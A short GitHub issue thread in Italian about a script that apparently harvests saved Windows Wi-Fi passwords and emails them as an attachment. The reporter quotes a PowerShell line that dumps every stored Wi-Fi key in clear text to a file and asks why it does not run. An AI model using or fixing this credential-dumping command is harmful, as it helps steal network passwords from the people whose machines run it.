### ISSUE TITLE
Problemi con l'esecuzione

### ISSUE THREAD

**Issue by Lambru99** [esixarmy/trovare-password-wifi#2]
Ci sono dei piccoli problemi che ho riscontrato, non so se i problemi sono dovuti ad un aggiornamento di Windows, che ha cambiato determinati comandi/impostazioni predefinite, o da altro.
Nel particolare:
- Lo script funziona solo se l'utente ha selezionata l'opzione nelle impostazioni "Sostituisci il prompt dei comandi con Windows PowerShell ....."
- A me personalmente invia la mail e tutto ma non invia l'allegato perché effettivamente non crea nessun file .txt
infatti questo pezzo di codice non viene eseguito ""(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Out-File wifi.txt; exit""
P.S. Ho provato ad eseguire a mano i comandi e funzionano, il problema sta nelle prime righe di codice.

**Comment by dentava** [comment]
Ciao, scusa, per cosa è la mail?

Il lun 2 nov 2020, 16:27 Ludovico Latini <notifications@github.com> ha
scritto:
